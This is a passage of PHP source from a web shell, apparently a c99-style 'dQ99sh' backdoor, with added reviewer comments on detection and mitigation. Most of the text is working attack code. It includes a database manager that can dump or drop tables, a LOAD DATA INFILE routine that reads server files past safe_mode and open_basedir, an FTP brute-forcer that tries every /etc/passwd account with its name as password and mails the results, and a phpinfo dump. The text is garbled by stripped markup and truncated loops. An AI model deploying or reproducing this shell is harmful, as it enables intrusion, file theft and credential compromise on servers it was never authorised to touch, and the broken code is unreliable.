$v = join(DIRECTORY_SEPARATOR,$a);
}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "".$item[0]." n";
}
}
echo " n";
echo "n";
# Breadcrumb: one entry per component of $d; $t accumulates the path up to
# and including component $i.
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b) {
$t = ""; $j = 0;
foreach ($e as $r) {
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) { break; }
$j++;
}
echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR." n";
$i++;
}
echo " - ";
# Records whether the current directory is writable by the PHP process.
if (is_writable($d)) {
$wd = TRUE;
$wdt = "[OK] ";
echo "".view_perms(fileperms($d))." ";
}
else {
$wd = FALSE;
$wdt = "[Read-Only] ";
echo "".view_perms_color($d)." ";
}
echo "n
n";
?>
Directory:
/***********************/
/** INFORMATION TABLE **/
/***********************/
echo "n";
# Default action is the directory listing.
if ($act == "") { $act = $dspact = "ls"; }
# SQL manager entry. The if opened here is not closed within this run of
# statements.
if ($act == "sql") {
# The database login, password, server, port and database name are appended
# to the link prefix as query-string parameters. For incident response this
# means database credentials entered here can appear in web-server access
# logs and Referer headers when the links are sent with GET; treat any such
# credential as exposed and rotate it.
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
echo "Attention! MySQL Manager is NOT a ready module! Don't reports bugs. ".
"".
"";
# NOTE(review): no assignment to $sql_sock is visible in this listing; the
# connect code was presumably lost with the stripped markup.
if (!$sql_sock) {
echo "If login is null, login is owner of process. If host is null, host is localhost If port is null, port is 3306 (default) ";
echo "Please, fill the form: ";
}
else {
//Start left panel
if (!empty($sql_db)) {
?>">Home
$result = mysql_list_tables($sql_db);
if (!$result) {echo mysql_smarterror();}
else {
echo "---[ ".htmlspecialchars($sql_db)." ]--- ";
$c = 0;
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "+ ".htmlspecialchars($row[0])." (".$count_row[0].") "; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";}
}
}
else {
?>Home
$result = mysql_list_dbs($sql_sock);
if (!$result) {echo mysql_smarterror();}
else {
?>
$c = 0;
$dbs = "";
while ($row = mysql_fetch_row($result)) {$dbs .= ""; $c++;}
echo " Databases (".$c.") ";
echo $dbs;
}
?> Please, select database
}
//End left panel
echo "";
//Start center panel
$diplay = TRUE;
if ($sql_db) {
if (!is_numeric($c)) {$c = 0;}
if ($c == 0) {$c = "no";}
echo "There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db)."). ";
if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo " ";
$acts = array("","dump");
if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` n";} $sql_act = "query";}
elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
elseif ($sql_tbl_act == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_act = "query";
$sql_tbl_act = "browse";
}
elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_act = "query";
$sql_tbl_act = "browse";
}
}
if ($sql_act == "query") {
echo " ";
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {echo "";}
}
if (in_array($sql_act,$acts)) {
?>
if (!empty($sql_act)) {echo " ";}
if ($sql_act == "newtbl") {
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! ";
}
else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();}
}
elseif ($sql_act == "dump") {
if (empty($submit)) {
$diplay = FALSE;
echo "SQL-Dump: ";
echo "DB: ";
$v = join (";",$dmptbls);
echo "Only tables (explode ";") 1 : ";
if ($dump_file) {$tmp = $dump_file;}
else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
echo "File: ";
echo "Download: ";
echo "Save to file: ";
echo "1 - all, if empty";
echo " ";
}
else {
$diplay = TRUE;
$set = array();
$set["sock"] = $sql_sock;
$set["db"] = $sql_db;
$dump_out = "download";
$set["print"] = 0;
$set["nl2br"] = 0;
$set[""] = 0;
$set["file"] = $dump_file;
$set["add_drop"] = TRUE;
$set["onlytabs"] = array();
if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
$ret = mysql_dump($set);
if ($sql_dump_download) {
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($ret));
header("Content-disposition: attachment; filename="".basename($sql_dump_file)."";");
echo $ret;
exit;
}
elseif ($sql_dump_savetofile) {
$fp = fopen($sql_dump_file,"w");
if (!$fp) {echo "Dump error! Can't write to "".htmlspecialchars($sql_dump_file).""!";}
else {
fwrite($fp,$ret);
fclose($fp);
echo "Dumped! Dump has been writed to "".htmlspecialchars(realpath($sql_dump_file))."" (".view_size(filesize($sql_dump_file)).") .";
}
}
else {echo "Dump: nothing to do! ";}
}
}
if ($diplay) {
if (!empty($sql_tbl)) {
if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
$count_row = mysql_fetch_array($count);
mysql_free_result($count);
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
$tbl_struct_fields = array();
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
$perpage = $sql_tbl_le - $sql_tbl_ls;
if (!is_numeric($perpage)) {$perpage = 10;}
$numpages = $count_row[0]/$perpage;
$e = explode(" ",$sql_order);
if (count($e) == 2) {
if ($e[0] == "d") {$asc_desc = "DESC";}
else {$asc_desc = "ASC";}
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
}
else {$v = "";}
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
$result = mysql_query($query) or print(mysql_smarterror());
echo " Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows) ";
echo "[ Structure ] ";
echo "[ Browse ] ";
echo "[ Dump ] ";
echo "[ Insert ] ";
if ($sql_tbl_act == "structure") {echo "Coming sooon! ";}
if ($sql_tbl_act == "insert") {
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
if (!empty($sql_tbl_insert_radio)) { } //Not Ready
else {
echo "Inserting row into table: ";
if (!empty($sql_tbl_insert_q)) {
$sql_query = "SELECT * FROM `".$sql_tbl."`";
$sql_query .= " WHERE".$sql_tbl_insert_q;
$sql_query .= " LIMIT 1;";
$result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror());
$values = mysql_fetch_assoc($result);
mysql_free_result($result);
}
else {$values = array();}
echo " ";
echo "Insert as new row ";
if (!empty($sql_tbl_insert_q)) {echo " or Save "; echo " ";}
echo " ";
}
}
if ($sql_tbl_act == "browse") {
$sql_tbl_ls = abs($sql_tbl_ls);
$sql_tbl_le = abs($sql_tbl_le);
echo " ";
echo " ";
$b = 0;
for($i=0;$i<$numpages;$i++) {
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
echo $i;
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo " ";}
if (($i/30 == round($i/30)) and ($i > 0)) {echo " ";}
else {echo " ";}
}
if ($i == 0) {echo "empty";}
echo "From: To: ";
echo "";
echo "With selected: ";
echo "Delete ";
echo "
";
}
}
else {
$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
if (!$result) {echo mysql_smarterror();}
else
{
echo "";
echo "With selected: ";
echo "Drop ";
echo "Empty ";
echo "Dump ";
echo "Check table ";
echo "Optimize table ";
echo "Repair table ";
echo "Analyze table ";
echo "
";
mysql_free_result($result);
}
}
}
}
}
else {
$acts = array("","newdb","serverstatus","servervars","processes","getfile");
if (in_array($sql_act,$acts)) {?> if (!empty($sql_act)) {
echo " ";
if ($sql_act == "newdb") {
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! ";}
else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();}
}
if ($sql_act == "serverstatus") {
$result = mysql_query("SHOW STATUS", $sql_sock);
echo "Server-status variables: ";
echo "Name Value ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]." ".$row[1]." ";}
echo "
";
mysql_free_result($result);
}
if ($sql_act == "servervars") {
$result = mysql_query("SHOW VARIABLES", $sql_sock);
echo "Server variables: ";
echo "Name Value ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "".$row[0]." ".$row[1]." ";}
echo "
";
mysql_free_result($result);
}
if ($sql_act == "processes") {
if (!empty($kill)) {
$query = "KILL ".$kill.";";
$result = mysql_query($query, $sql_sock);
echo "Process #".$kill." was killed. ";
}
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "Processes: ";
echo "ID USER HOST DB COMMAND TIME STATE INFO Action ";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill ";}
echo "
";
mysql_free_result($result);
}
# "getfile": reads a server-side file through the database instead of PHP.
# It selects (or creates) a scratch database named <sql_login>_tmpdb, creates
# a one-column LONGBLOB table, loads the requested path into it with
# LOAD DATA INFILE, prints the rows and drops the table and database again.
# The column name states the purpose: the read is performed by the MySQL
# server process, so PHP's safe_mode and open_basedir do not apply to it.
# Mitigation: application database accounts should not hold the FILE
# privilege, and the server's secure_file_priv setting should confine file
# import to a dedicated directory.
# Detection: CREATE DATABASE / DROP DATABASE on a name ending in "_tmpdb"
# and a table called tmp_file in the database query or binary log.
# NOTE(review): $created is set but never read in the visible code. The
# path uses addslashes() inside inner quotes that are unescaped as printed.
if ($sql_act == "getfile")
{
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
if ($select)
{
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE "".addslashes($sql_getfile)."" INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {echo "Error in reading file (permision denied)! ";}
else
{
# NOTE(review): the for statement below is truncated as printed; text
# between "<" and ">" was presumably removed by the page extraction.
for ($i=0;$i $f = "";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("rn",$row);}
# The file name is echoed unescaped; only the file content is escaped.
if (empty($f)) {echo "File "".$sql_getfile."" does not exists or empty! ";}
else {echo "File "".$sql_getfile."": ".nl2br(htmlspecialchars($f))." ";}
mysql_free_result($result);
mysql_query("DROP TABLE tmp_file;");
}
}
mysql_drop_db($tmpdb);
}
}
}
}
echo "
n";
if ($sql_sock) {
$affected = @mysql_affected_rows($sql_sock);
if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
echo " Affected rows : ".$affected." ";
}
echo "
n";
}
//End of SQL Manager
# "ftpquickbrute": for each account line in /etc/passwd, tries an FTP login
# on localhost port 21 with the account name as both login and password.
# Not run on Windows. getmicrotime() and $nixpwdperpage are defined outside
# the visible part of the file.
# Detection: a burst of FTP login attempts from the loopback address, one
# per local account in /etc/passwd order, each with a one-second connect
# timeout; plus an optional log file named
# dQ99sh_ftpquickbrute_<d.m.Y_H_i_s>.log and an optional report e-mail.
# Mitigation: accounts whose password equals the user name are the only
# ones this check can find; a password policy that forbids that, and FTP
# restricted to accounts that need it, removes the exposure.
# NOTE(review): "rn" in the log strings is presumably "\r\n", and the inner
# double quotes are unescaped as printed; backslashes were lost in
# extraction.
if ($act == "ftpquickbrute") {
echo " ";
echo "";
if ($win) { echo "Can't run on Windows!"; }
else {
# dQ99ftpbrutecheck(): returns TRUE when the FTP login succeeds; otherwise
# falls off the end and returns NULL. When $fqb_onlywithsh is set, accounts
# whose shell is "/bin/FALSE" or "/sbin/nologin" are skipped.
# The connection is never closed.
function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
else {$TRUE = TRUE;}
if ($TRUE) {
$sock = @ftp_connect($host,$port,$timeout);
if (@ftp_login($sock,$login,$pass)) {
echo "Connected to ".$host." with login "".$login."" and password "".$pass."" . ";
ob_flush();
return TRUE;
}
}
}
if (!empty($submit)) {
# $fqb_lenght caps how many passwd lines are read.
if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
$fp = fopen("/etc/passwd","r");
if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
else {
if ($fqb_logging) {
if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
else {$fqb_logfp = FALSE;}
$fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."rnrn";
if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
}
ob_flush();
$i = $success = 0;
$ftpquick_st = getmicrotime();
while(!feof($fp)) {
# passwd fields: index 0 is the account name, index 6 the login shell.
$str = explode(":",fgets($fp,2048));
if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
echo "Connected to ".getenv("SERVER_NAME")." with login "".$str[0]."" and password "".$str[0]."" ";
$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login "".$str[0]."" and password "".$str[0]."", at ".date("d.m.Y H:i:s")."rn";
# The whole log text is rewritten from offset 0 after each success.
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
$success++;
ob_flush();
}
if ($i > $fqb_lenght) {break;}
$i++;
}
if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!rn";}
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
echo "Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." ";
$fqb_log .= "rn------------------------------------------rnDone!rnTotal time (secs.): ".$ftpquick_t."rnTotal connections: ".$i."rnSuccess.: ".$success."rnUnsuccess.:".($i-$success)."rnConnects per second: ".round($i/$ftpquick_t,2)."rn";
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
# NOTE(review): fclose() is called even when logging was off or the log
# file could not be opened; the passwd handle $fp is never closed.
fclose($fqb_logfp);
}
}
else {
# No submission yet: print the options form with a default log-file name
# under $tmpdir_logs.
$logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
echo " ".
"Read first: ".
" Users only with shell ".
" Logging ".
"Logging to file: ".
"Logging to e-mail: ".
" ";
}
echo "
";
}
}
# "d": prints owner/group (non-Windows), permissions and the three
# timestamps of directory $d. view_perms_color() is defined outside the
# visible part of the file.
# NOTE(review): $d is echoed unescaped in the error branch, and $row[] is
# filled with the owner/group text but not printed in the visible code.
if ($act == "d") {
if (!is_dir($d)) { echo "$d is a not a Directory! "; }
else {
echo "Directory information: ";
if (!$win) {
echo "Owner/Group ";
# Fall back to the numeric id when the name lookup returns nothing.
$ow = posix_getpwuid(fileowner($d));
$gr = posix_getgrgid(filegroup($d));
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
}
echo " Perms ".view_perms_color($d)." Create time ".date("d/m/Y H:i:s",filectime($d))." Access time ".date("d/m/Y H:i:s",fileatime($d))." MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
";
}
}
# "phpinfo": discards buffered output, prints the full phpinfo() page and
# ends the request through dQ99shexit() (defined outside the visible part
# of the file). phpinfo() output includes environment variables and the
# full PHP configuration of the host.
if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();}
if ($act == "security") {
echo "n".
"n".
"Open Base Dir <Редактировалось:23.09.2019 23:44:14 пользователем